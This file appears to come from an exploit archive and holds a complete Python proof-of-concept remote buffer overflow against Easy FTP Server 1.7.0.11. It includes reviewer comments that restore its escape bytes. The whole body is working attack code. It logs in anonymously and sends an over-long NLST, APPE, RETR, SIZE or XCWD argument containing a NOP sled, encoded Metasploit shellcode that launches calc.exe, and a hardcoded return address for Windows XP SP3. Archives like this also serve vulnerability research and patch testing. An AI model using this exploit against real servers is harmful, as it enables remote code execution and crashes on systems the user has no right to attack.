
easyftpnlst-overflow.txt

Posted on 12 August 2010

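# Exploit Title: Easy FTP Server v1.7.0.11 NLST, NLST -al, APPE, RETR, SIZE and XCWD Commands Remote Buffer Overflow Exploit
# Date: 10/8/2010
# Author: Rabih Mohsen
# Software Link: http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3
# CVE:
#
# NOTE(review): the copy of this file that was reviewed had lost every backslash
# in its escape sequences ("xdaxc0..." for "\xda\xc0...") and the CRLF line
# terminators on the FTP commands.  Both are restored below; the byte counts
# stated in the original comments (228-byte shellcode, 272 bytes to EIP) are
# used as the check that nothing was dropped in transcription.
"""Proof-of-concept stack overflow for Easy FTP Server 1.7.0.11 (Python 3).

An over-long argument to any of NLST, NLST -al, APPE, RETR, SIZE or XCWD
overwrites the saved return address 272 bytes into the argument.  The line
sent to the server is laid out as::

    <CMD> <16 NOPs><228-byte shellcode><28 NOPs><EIP = CALL EDI>\\r\\n

Usage: ``python easyftpnlst-overflow.py <target> <command>``
"""
import socket
import sys

buffersize = 272  # bytes of argument before the saved return address is overwritten

# Bytes the target mangles inside the argument (NUL, LF, '/' and '\\'); the
# encoder was run with these excluded, and build_overflow() re-checks them.
BADCHARS = (b"\x00", b"\x0a", b"\x2f", b"\x5c")

# Command verbs the advisory header lists as vulnerable ("NLST -al" is NLST
# with an argument; the overflow is in the argument handling for all of them).
VULN_COMMANDS = ("NLST", "APPE", "RETR", "SIZE", "XCWD")

# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ]
shellcode = (
    b"\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
    b"\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
    b"\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
    b"\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
    b"\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
    b"\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
    b"\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
    b"\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
    b"\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
    b"\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
    b"\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
    b"\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
    b"\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
    b"\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
    b"\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
    b"\x51\x6b\x28"
)

# CALL EDI in user32.dll, 0x7E41C891 written little-endian.  This address is
# only valid for the Windows XP SP3 user32.dll the exploit was tested against;
# other builds/service packs ship a different user32.dll, and from Vista on the
# module is ASLR-rebased, so the return address must be re-derived per target.
eip = b"\x91\xC8\x41\x7E"
nopsled = b"\x90" * 16
# Filler between the end of the shellcode and the saved return address
# (the original script called this "payload"; the name is kept for callers).
payload = b"\x90" * (buffersize - (len(nopsled) + len(shellcode)))


def build_overflow(cmd):
    """Return the complete FTP command line that triggers the overflow.

    Args:
        cmd: the vulnerable command to abuse, e.g. ``"NLST"`` or ``"NLST -al"``.
            Only the first word is checked against ``VULN_COMMANDS``
            (case-insensitively); the string is sent as given.

    Returns:
        ``bytes``: ``<cmd> <nopsled><shellcode><filler><eip>\\r\\n``.

    Raises:
        ValueError: if ``cmd`` is empty or its verb is not a known vulnerable
            command, or if the assembled overflow contains one of ``BADCHARS``
            (which would indicate a mistranscribed shellcode or return address).
    """
    words = cmd.split()
    verb = words[0].upper() if words else ""
    if verb not in VULN_COMMANDS:
        raise ValueError(
            "unsupported command %r; expected one of %s" % (cmd, ", ".join(VULN_COMMANDS))
        )
    overflow = nopsled + shellcode + payload + eip
    for bad in BADCHARS:
        if bad in overflow:
            raise ValueError("bad char %r present in overflow buffer" % bad)
    # FTP lines are CRLF-terminated (RFC 959); the terminator was missing from
    # the reviewed copy and is re-added here.
    return cmd.encode("ascii") + b" " + overflow + b"\r\n"


def GenericEasyFTPExploit(target, CMDS, *, timeout=10):
    """Log in anonymously to ``target``:21 and send the overflow via ``CMDS``.

    Args:
        target: hostname or IP address of the Easy FTP Server instance.
        CMDS: the vulnerable command to abuse (see ``VULN_COMMANDS``).
        timeout: socket timeout in seconds.  The original blocked forever on a
            server that stopped answering; a crashed service is the expected
            outcome here, so a bounded wait is needed.

    Raises:
        ValueError: from ``build_overflow`` for an unsupported command, raised
            before any connection is opened.
        OSError: on connection or login failure (``socket.timeout`` is an
            ``OSError`` subclass).  Errors *after* the overflow has been sent
            are swallowed, because a reset or silence at that point is what a
            successful overflow looks like.
    """
    overflow = build_overflow(CMDS)
    with socket.create_connection((target, 21), timeout=timeout) as s:
        s.recv(1024)  # banner
        s.sendall(b"User anonymous\r\n")
        s.recv(1024)
        s.sendall(b"PASS anonymous\r\n")
        s.recv(1024)  # consume the login reply so the next recv() reflects the overflow
        s.sendall(overflow)
        try:
            s.recv(1024)
            s.sendall(b"QUIT EASY ftp\r\n")
        except OSError:
            pass  # service crashed or was hijacked: expected after the overflow


def main(argv=None):
    """Command-line entry point: ``<target> <command>``.  Returns the exit status."""
    argv = sys.argv[1:] if argv is None else argv
    if len(argv) != 2:
        sys.stderr.write(
            "usage: %s <target> <%s>\n" % (sys.argv[0], "|".join(VULN_COMMANDS))
        )
        return 2
    target, CMDS = argv
    GenericEasyFTPExploit(target, CMDS)
    return 0


if __name__ == "__main__":
    sys.exit(main())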

 
